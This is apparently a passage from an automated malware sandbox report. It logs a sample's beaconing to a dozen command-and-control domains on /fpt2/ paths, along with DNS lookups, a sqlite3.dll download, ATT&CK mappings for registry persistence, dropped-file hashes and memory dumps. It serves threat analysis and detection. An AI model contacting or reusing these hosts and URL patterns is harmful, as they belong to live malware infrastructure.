Accept-Language: en-US,en;q=0.9
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31

Response

HTTP/1.1 200 OK

Server: nginx/1.20.2
Date: Wed, 22 Nov 2023 05:20:25 GMT
Content-Type: text/html
Content-Length: 5208
Last-Modified: Wed, 11 Oct 2023 10:00:52 GMT
Vary: Accept-Encoding
ETag: "65267254-1458"
Cache-Control: no-cache
Accept-Ranges: bytes
Via: 1.1 google
Connection: close
DNS

www.gdyanjiu.icu

Explorer.EXE

Remote address:

8.8.8.8:53

Request

www.gdyanjiu.icu

IN A

Response

www.gdyanjiu.icu

IN CNAME

256.93cu.com

256.93cu.com

IN A

8.217.92.5
POST

http://www.gdyanjiu.icu/fpt2/

Explorer.EXE

Remote address:

8.217.92.5:80

Request

POST /fpt2/ HTTP/1.1
Host: www.gdyanjiu.icu
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Origin: http://www.gdyanjiu.icu
Referer: http://www.gdyanjiu.icu/fpt2/
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 183
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31

Response

HTTP/1.1 404 Not Found

Server: nginx
Date: Wed, 22 Nov 2023 05:20:31 GMT
Content-Type: text/html
Content-Length: 548
Connection: close
GET

http://www.gdyanjiu.icu/fpt2/?pz=6mvp3dQCPu60jkMtL2C2VIKMpc76AW5qzkZ3VNug8x7oYZTXy45EFsXFukAZsy2YWLqM/SaDtNDJGljH2QpsieZaLwCb&YF6=MRgpt-

Explorer.EXE

Remote address:

8.217.92.5:80

Request

GET /fpt2/?pz=6mvp3dQCPu60jkMtL2C2VIKMpc76AW5qzkZ3VNug8x7oYZTXy45EFsXFukAZsy2YWLqM/SaDtNDJGljH2QpsieZaLwCb&YF6=MRgpt- HTTP/1.1
Host: www.gdyanjiu.icu
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31

Response

HTTP/1.1 404 Not Found

Server: nginx
Date: Wed, 22 Nov 2023 05:20:34 GMT
Content-Type: text/html
Content-Length: 548
Connection: close

136.243.92.92:80

http://www.mobdigim.com/fpt2/?pz=Hg9XM0UlQopWT4uq/OU/iYY3wdp8Cg94EtrOjqvgZSsCDfQXTUm2cy6B1CuRYksWvpJlBE+O5S0Y+caME5BMYbfNa1l7&YF6=MRgpt-

http

Explorer.EXE

680 B
1.2kB
5
5

HTTP Request

GET http://www.mobdigim.com/fpt2/?pz=Hg9XM0UlQopWT4uq/OU/iYY3wdp8Cg94EtrOjqvgZSsCDfQXTUm2cy6B1CuRYksWvpJlBE+O5S0Y+caME5BMYbfNa1l7&YF6=MRgpt-

HTTP Response

301
45.33.6.223:80

http://www.sqlite.org/2019/sqlite-dll-win32-x86-3300000.zip

http

mstsc.exe

9.3kB
504.5kB
194
365

HTTP Request

GET http://www.sqlite.org/2019/sqlite-dll-win32-x86-3300000.zip

HTTP Response

200
91.194.2.86:80

http://www.finebb.net/fpt2/

http

Explorer.EXE

1.2kB
13.5kB
10
13

HTTP Request

POST http://www.finebb.net/fpt2/

HTTP Response

301
91.194.2.86:80

http://www.finebb.net/fpt2/?pz=a03iXbdPIix9fRMHzU7LE8iAlr5ha2Q41Lr6ixgTxj+lXehLxFWfCCOIk5GT/BjW7D2eUV/ItGi5aEAe2DnFKsm9EzqL&YF6=MRgpt-

http

Explorer.EXE

908 B
13.6kB
10
14

HTTP Request

GET http://www.finebb.net/fpt2/?pz=a03iXbdPIix9fRMHzU7LE8iAlr5ha2Q41Lr6ixgTxj+lXehLxFWfCCOIk5GT/BjW7D2eUV/ItGi5aEAe2DnFKsm9EzqL&YF6=MRgpt-

HTTP Response

301
34.92.57.107:80

http://www.yf168vip.com/fpt2/

http

Explorer.EXE

961 B
863 B
5
4

HTTP Request

POST http://www.yf168vip.com/fpt2/

HTTP Response

404
34.92.57.107:80

http://www.yf168vip.com/fpt2/?pz=+Pv5RKJKlOGhsp9xzDjtrCt3KaT+wN1FLngvtNJPFyCXQ9yT2cbGZ5T7ZO2Qq14r+5AArPVFnIkI6MVJnjcaY83B5jvg&YF6=MRgpt-

http

Explorer.EXE

680 B
903 B
5
5

HTTP Request

GET http://www.yf168vip.com/fpt2/?pz=+Pv5RKJKlOGhsp9xzDjtrCt3KaT+wN1FLngvtNJPFyCXQ9yT2cbGZ5T7ZO2Qq14r+5AArPVFnIkI6MVJnjcaY83B5jvg&YF6=MRgpt-

HTTP Response

404
13.248.169.48:80

http://www.shortfall.net/fpt2/

http

Explorer.EXE

1.0kB
1.1kB
6
5

HTTP Request

POST http://www.shortfall.net/fpt2/

HTTP Response

405
13.248.169.48:80

http://www.shortfall.net/fpt2/?pz=BEk/HyvD1ApKclZgHhHVoRJGXzHFyBd9iCFWFrLupWJDmJhCU+tan5xFERllc5FlkjcoiH4tpQ3GJxurFh9q9fs5VQOK&YF6=MRgpt-

http

Explorer.EXE

1.0kB
13.9kB
13
18

HTTP Request

GET http://www.shortfall.net/fpt2/?pz=BEk/HyvD1ApKclZgHhHVoRJGXzHFyBd9iCFWFrLupWJDmJhCU+tan5xFERllc5FlkjcoiH4tpQ3GJxurFh9q9fs5VQOK&YF6=MRgpt-

HTTP Response

200
203.161.61.170:80

http://www.tecverse.xyz/fpt2/

http

Explorer.EXE

961 B
1.0kB
5
4

HTTP Request

POST http://www.tecverse.xyz/fpt2/

HTTP Response

404
203.161.61.170:80

http://www.tecverse.xyz/fpt2/?pz=kmEA0abd5YyeJVI62R5X7XpLu+SmFuKVzFUIPRx4j4eSHm+QbJspSaqzIrLQdJsv4iNbR93ZPS2DputNIuZEk+22xRga&YF6=MRgpt-

http

Explorer.EXE

680 B
1.1kB
5
5

HTTP Request

GET http://www.tecverse.xyz/fpt2/?pz=kmEA0abd5YyeJVI62R5X7XpLu+SmFuKVzFUIPRx4j4eSHm+QbJspSaqzIrLQdJsv4iNbR93ZPS2DputNIuZEk+22xRga&YF6=MRgpt-

HTTP Response

404
185.83.146.204:80

http://www.hreeremaeps.com/fpt2/

http

Explorer.EXE

970 B
401 B
5
4

HTTP Request

POST http://www.hreeremaeps.com/fpt2/

HTTP Response

404
185.83.146.204:80

http://www.hreeremaeps.com/fpt2/?pz=PVLQ1OYcDtmtS6mlaIs9mafN1rqX6opagePU/1WVbH2sXsdip4LlZsLtbV4mevB5sNCA1FFZdfEVrxwxl5AqGiugiysq&YF6=MRgpt-

http

Explorer.EXE

683 B
441 B
5
5

HTTP Request

GET http://www.hreeremaeps.com/fpt2/?pz=PVLQ1OYcDtmtS6mlaIs9mafN1rqX6opagePU/1WVbH2sXsdip4LlZsLtbV4mevB5sNCA1FFZdfEVrxwxl5AqGiugiysq&YF6=MRgpt-

HTTP Response

404
208.91.197.132:80

http://www.shopbons-mall.com/fpt2/

http

Explorer.EXE

884 B
92 B
3
2

HTTP Request

POST http://www.shopbons-mall.com/fpt2/
208.91.197.132:80

http://www.shopbons-mall.com/fpt2/?pz=6UkeOgRo4ePloh1yFoxHPsMfzZ6p6zlaujZ8SKHBP3+vyOlbx4lZ4H+sEihSMXlzaeFJp2Nsdm5H90jVgpEuC4hvrEHL&YF6=MRgpt-

http

Explorer.EXE

1.1kB
20.4kB
13
19

HTTP Request

GET http://www.shopbons-mall.com/fpt2/?pz=6UkeOgRo4ePloh1yFoxHPsMfzZ6p6zlaujZ8SKHBP3+vyOlbx4lZ4H+sEihSMXlzaeFJp2Nsdm5H90jVgpEuC4hvrEHL&YF6=MRgpt-

HTTP Response

200
188.114.96.0:80

http://www.cmmug.asia/fpt2/

http

Explorer.EXE

1.1kB
7.5kB
8
9

HTTP Request

POST http://www.cmmug.asia/fpt2/

HTTP Response

502
188.114.96.0:80

http://www.cmmug.asia/fpt2/?pz=v+WmR1cg7tS0xW3sxOcH7qLyIjHIvwIYt3SWFLykJ0c2lILgMSLvRqA6qw3Mnj882j+rmYnjx3WL99L/u7fVyIhDBdb9&YF6=MRgpt-

http

Explorer.EXE

678 B
981 B
5
5

HTTP Request

GET http://www.cmmug.asia/fpt2/?pz=v+WmR1cg7tS0xW3sxOcH7qLyIjHIvwIYt3SWFLykJ0c2lILgMSLvRqA6qw3Mnj882j+rmYnjx3WL99L/u7fVyIhDBdb9&YF6=MRgpt-

HTTP Response

502
34.120.175.65:80

http://www.333vvs.com/fpt2/

http

Explorer.EXE

955 B
907 B
5
4

HTTP Request

POST http://www.333vvs.com/fpt2/

HTTP Response

405
34.120.175.65:80

http://www.333vvs.com/fpt2/?pz=fXnFlfaj4bnF07Ur9jveJK9dI70BJd2bKF9irEfQcuBCqwd6ATMFeUvwAAuNXbAn8HdTrUcpf4Du0ZgIUjZaDVOeDAKa&YF6=MRgpt-

http

Explorer.EXE

770 B
5.9kB
7
9

HTTP Request

GET http://www.333vvs.com/fpt2/?pz=fXnFlfaj4bnF07Ur9jveJK9dI70BJd2bKF9irEfQcuBCqwd6ATMFeUvwAAuNXbAn8HdTrUcpf4Du0ZgIUjZaDVOeDAKa&YF6=MRgpt-

HTTP Response

200
8.217.92.5:80

http://www.gdyanjiu.icu/fpt2/

http

Explorer.EXE

961 B
863 B
5
4

HTTP Request

POST http://www.gdyanjiu.icu/fpt2/

HTTP Response

404
8.217.92.5:80

http://www.gdyanjiu.icu/fpt2/?pz=6mvp3dQCPu60jkMtL2C2VIKMpc76AW5qzkZ3VNug8x7oYZTXy45EFsXFukAZsy2YWLqM/SaDtNDJGljH2QpsieZaLwCb&YF6=MRgpt-

http

Explorer.EXE

680 B
903 B
5
5

HTTP Request

GET http://www.gdyanjiu.icu/fpt2/?pz=6mvp3dQCPu60jkMtL2C2VIKMpc76AW5qzkZ3VNug8x7oYZTXy45EFsXFukAZsy2YWLqM/SaDtNDJGljH2QpsieZaLwCb&YF6=MRgpt-

HTTP Response

404

8.8.8.8:53

www.ljwixsb.top

dns

Explorer.EXE

61 B
131 B
1
1

DNS Request

www.ljwixsb.top
8.8.8.8:53

www.mobdigim.com

dns

Explorer.EXE

62 B
92 B
1
1

DNS Request

www.mobdigim.com

DNS Response

136.243.92.92
8.8.8.8:53

www.sqlite.org

dns

mstsc.exe

60 B
76 B
1
1

DNS Request

www.sqlite.org

DNS Response

45.33.6.223
8.8.8.8:53

www.finebb.net

dns

Explorer.EXE

60 B
76 B
1
1

DNS Request

www.finebb.net

DNS Response

91.194.2.86
8.8.8.8:53

www.yf168vip.com

dns

Explorer.EXE

62 B
111 B
1
1

DNS Request

www.yf168vip.com

DNS Response

34.92.57.107
8.8.8.8:53

www.shortfall.net

dns

Explorer.EXE

63 B
95 B
1
1

DNS Request

www.shortfall.net

DNS Response

13.248.169.48

76.223.54.146
8.8.8.8:53

www.tecverse.xyz

dns

Explorer.EXE

62 B
78 B
1
1

DNS Request

www.tecverse.xyz

DNS Response

203.161.61.170
8.8.8.8:53

www.hreeremaeps.com

dns

Explorer.EXE

65 B
95 B
1
1

DNS Request

www.hreeremaeps.com

DNS Response

185.83.146.204
8.8.8.8:53

www.shopbons-mall.com

dns

Explorer.EXE

67 B
83 B
1
1

DNS Request

www.shopbons-mall.com

DNS Response

208.91.197.132
8.8.8.8:53

www.cmmug.asia

dns

Explorer.EXE

60 B
92 B
1
1

DNS Request

www.cmmug.asia

DNS Response

188.114.96.0

188.114.97.0
8.8.8.8:53

www.333vvs.com

dns

Explorer.EXE

60 B
92 B
1
1

DNS Request

www.333vvs.com

DNS Response

34.120.175.65

35.244.161.158
8.8.8.8:53

www.gdyanjiu.icu

dns

Explorer.EXE

62 B
104 B
1
1

DNS Request

www.gdyanjiu.icu

DNS Response

8.217.92.5

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\ppxsvdjxm.exe

Filesize
200KB

MD5
e2b11a71264882a61a309c24903c5696

SHA1
5341f71ee94eb7e32f0fb588a5fe95ebbf06e772

SHA256
b77970e17899b7bd5266444aa666e3d7f39da83878bf09cb6dcd111e9eb5dec5

SHA512
bfe3ff2120531edf0b61d436717c1644da5d4f68ba0470977c7c87f6565d683686e55c183a411c7abbddc8547a45db8bd6372fe52bc33fe7a914548b20b6b906

Download Submit
C:\Users\Admin\AppData\Local\Temp\ppxsvdjxm.exe

Filesize
200KB

MD5
e2b11a71264882a61a309c24903c5696

SHA1
5341f71ee94eb7e32f0fb588a5fe95ebbf06e772

SHA256
b77970e17899b7bd5266444aa666e3d7f39da83878bf09cb6dcd111e9eb5dec5

SHA512
bfe3ff2120531edf0b61d436717c1644da5d4f68ba0470977c7c87f6565d683686e55c183a411c7abbddc8547a45db8bd6372fe52bc33fe7a914548b20b6b906

Download Submit
C:\Users\Admin\AppData\Local\Temp\ppxsvdjxm.exe

Filesize
200KB

MD5
e2b11a71264882a61a309c24903c5696

SHA1
5341f71ee94eb7e32f0fb588a5fe95ebbf06e772

SHA256
b77970e17899b7bd5266444aa666e3d7f39da83878bf09cb6dcd111e9eb5dec5

SHA512
bfe3ff2120531edf0b61d436717c1644da5d4f68ba0470977c7c87f6565d683686e55c183a411c7abbddc8547a45db8bd6372fe52bc33fe7a914548b20b6b906

Download Submit
C:\Users\Admin\AppData\Local\Temp\ppxsvdjxm.exe

Filesize
200KB

MD5
e2b11a71264882a61a309c24903c5696

SHA1
5341f71ee94eb7e32f0fb588a5fe95ebbf06e772

SHA256
b77970e17899b7bd5266444aa666e3d7f39da83878bf09cb6dcd111e9eb5dec5

SHA512
bfe3ff2120531edf0b61d436717c1644da5d4f68ba0470977c7c87f6565d683686e55c183a411c7abbddc8547a45db8bd6372fe52bc33fe7a914548b20b6b906

Download Submit
C:\Users\Admin\AppData\Local\Temp\pqndp.yn

Filesize
250KB

MD5
daf88cc0b867ad283c8de71074574e3d

SHA1
3f70e96bd3daa0e0dd2db29c14cc3dd7ea8239e9

SHA256
9ce0418bda184b005a58c40a535740cb0b4a5bd946f4fd913512109915831e08

SHA512
76f62207afc5268c6e43317f412409322449febaf1ea9765153b95e394d2494b935eaf3b46b6f8149ef49d3b199ecad5043b208e6975a4150d1b84722a8f938b

Download Submit
C:\Users\Admin\AppData\Local\Temp\tpaxc.zip

Filesize
478KB

MD5
72b88067a5a1a4f8d52c45e6621d13fe

SHA1
f84542474b8583f4371749282e5cc4d52661c222

SHA256
70a11669bb8ad1099fd7fba9da92e1a75124bef0d16a01fd10dcdc45e9582092

SHA512
a8bf75fd4f38e4c8dee5e6f2527062c5be21f5a8bae4ea561f4aa28139d65a6f215afb212f1e4857ee482e16e813fc0d63ef8ec43ec94d5f8a722489e89e154d

Download Submit
\Users\Admin\AppData\Local\Temp\ppxsvdjxm.exe

Filesize
200KB

MD5
e2b11a71264882a61a309c24903c5696

SHA1
5341f71ee94eb7e32f0fb588a5fe95ebbf06e772

SHA256
b77970e17899b7bd5266444aa666e3d7f39da83878bf09cb6dcd111e9eb5dec5

SHA512
bfe3ff2120531edf0b61d436717c1644da5d4f68ba0470977c7c87f6565d683686e55c183a411c7abbddc8547a45db8bd6372fe52bc33fe7a914548b20b6b906

Download Submit
\Users\Admin\AppData\Local\Temp\ppxsvdjxm.exe

Filesize
200KB

MD5
e2b11a71264882a61a309c24903c5696

SHA1
5341f71ee94eb7e32f0fb588a5fe95ebbf06e772

SHA256
b77970e17899b7bd5266444aa666e3d7f39da83878bf09cb6dcd111e9eb5dec5

SHA512
bfe3ff2120531edf0b61d436717c1644da5d4f68ba0470977c7c87f6565d683686e55c183a411c7abbddc8547a45db8bd6372fe52bc33fe7a914548b20b6b906

Download Submit
\Users\Admin\AppData\Local\Temp\ppxsvdjxm.exe

Filesize
200KB

MD5
e2b11a71264882a61a309c24903c5696

SHA1
5341f71ee94eb7e32f0fb588a5fe95ebbf06e772

SHA256
b77970e17899b7bd5266444aa666e3d7f39da83878bf09cb6dcd111e9eb5dec5

SHA512
bfe3ff2120531edf0b61d436717c1644da5d4f68ba0470977c7c87f6565d683686e55c183a411c7abbddc8547a45db8bd6372fe52bc33fe7a914548b20b6b906

Download Submit
\Users\Admin\AppData\Local\Temp\sqlite3.dll

Filesize
910KB

MD5
d79258c5189103d69502eac786addb04

SHA1
f34b33681cfe8ce649218173a7f58b237821c1ef

SHA256
57d89a52061d70d87e40281f1196d53273f87860c4d707d667a8c7d9573da675

SHA512
da797f4dd1ad628aa4e8004b2e00b7c278facbc57a313f56b70dc8fcfbdb0050ea8b025b3475098223cce96ea53537d678273656d46c2d33d81b496d90da34b2

Download Submit
memory/1192-35-0x00000000089C0000-0x000000000ABB7000-memory.dmp

Filesize
34.0MB

Download
memory/1192-79-0x0000000006A20000-0x0000000006B22000-memory.dmp

Filesize
1.0MB

Download
memory/1192-24-0x00000000089C0000-0x000000000ABB7000-memory.dmp

Filesize
34.0MB

Download
memory/1192-34-0x0000000006A20000-0x0000000006B22000-memory.dmp

Filesize
1.0MB

Download
memory/1192-21-0x0000000003760000-0x0000000003860000-memory.dmp

Filesize
1024KB

Download
memory/1192-33-0x0000000006A20000-0x0000000006B22000-memory.dmp

Filesize
1.0MB

Download
memory/2152-9-0x00000000001B0000-0x00000000001B2000-memory.dmp

Filesize
8KB

Download
memory/2552-23-0x00000000003D0000-0x00000000003F3000-memory.dmp

Filesize
140KB

Download
memory/2552-16-0x0000000000400000-0x000000000043A000-memory.dmp

Filesize
232KB

Download
memory/2552-14-0x0000000000400000-0x000000000043A000-memory.dmp

Filesize
232KB

Download
memory/2552-27-0x0000000000400000-0x000000000043A000-memory.dmp

Filesize
232KB

Download
memory/2552-29-0x00000000003D0000-0x00000000003F3000-memory.dmp

Filesize
140KB

Download
memory/2552-17-0x00000000008B0000-0x0000000000BB3000-memory.dmp

Filesize
3.0MB

Download
memory/2552-18-0x0000000000400000-0x000000000043A000-memory.dmp

Filesize
232KB

Download
memory/2552-22-0x0000000000400000-0x000000000043A000-memory.dmp

Filesize
232KB

Download
memory/2552-20-0x0000000000400000-0x000000000043A000-memory.dmp

Filesize
232KB

Download
memory/2896-32-0x00000000009B0000-0x0000000000A52000-memory.dmp

Filesize
648KB

Download
memory/2896-30-0x0000000002090000-0x0000000002393000-memory.dmp

Filesize
3.0MB

Download
memory/2896-36-0x0000000000080000-0x00000000000B6000-memory.dmp

Filesize
216KB

Download
memory/2896-31-0x0000000000080000-0x00000000000B6000-memory.dmp

Filesize
216KB

Download
memory/2896-25-0x0000000000080000-0x00000000000B6000-memory.dmp

Filesize
216KB

Download
memory/2896-77-0x0000000061E00000-0x0000000061ECF000-memory.dmp

Filesize
828KB

Download
memory/2896-78-0x00000000009B0000-0x0000000000A52000-memory.dmp

Filesize
648KB

Download
memory/2896-26-0x0000000000080000-0x00000000000B6000-memory.dmp

Filesize
216KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

DNS Request

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Response

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.